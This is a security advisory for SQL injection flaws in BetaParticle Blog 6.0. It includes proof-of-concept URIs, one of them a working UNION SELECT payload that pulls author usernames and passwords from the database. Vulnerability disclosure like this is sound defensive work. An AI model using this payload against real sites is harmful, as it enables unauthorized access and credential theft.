BetaParticle Blog Multiple SQL Injection Vulnerabilities

Bugtraq ID:	17148
Class:	Input Validation Error
CVE:
Remote:	Yes
Local:	No
Published:	Mar 18 2006 12:00AM
Updated:	Mar 20 2006 09:39PM
Credit:	[email protected] is credited with discovery.
Vulnerable:	betaparticle betaparticle blog 6.0
Not Vulnerable:

BetaParticle Blog Multiple SQL Injection Vulnerabilities


BetaParticle Blog is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.

Successful exploitation could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.

BetaParticle Blog Multiple SQL Injection Vulnerabilities


These issues can be exploited via a web client.

The following proof-of-concept URIs are available:

http://www.example.com/bpdir/template_permalink.asp?id=[SQLQuery]

http://www.example.com/bpdir/template_gallery_detail.asp?fldGalleryID=[SQLQuery]

http://www.example.com/bpdir/template_gallery_detail.asp?fldGalleryID=-1+UNION+SELECT+null,fldAuthorUsername
,fldAuthorPassword,null,null+FROM+tblAuthor+where+fldAuthorId=1

BetaParticle Blog Multiple SQL Injection Vulnerabilities

Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]:[email protected].

BetaParticle Blog Multiple SQL Injection Vulnerabilities

References:

• betaparticle blog Homepage (betaparticle blog)
  
• Advisory: BetaParticle Blog <= 6.0 Multiple Remote SQL Injection Vulnerabilitie ([email protected])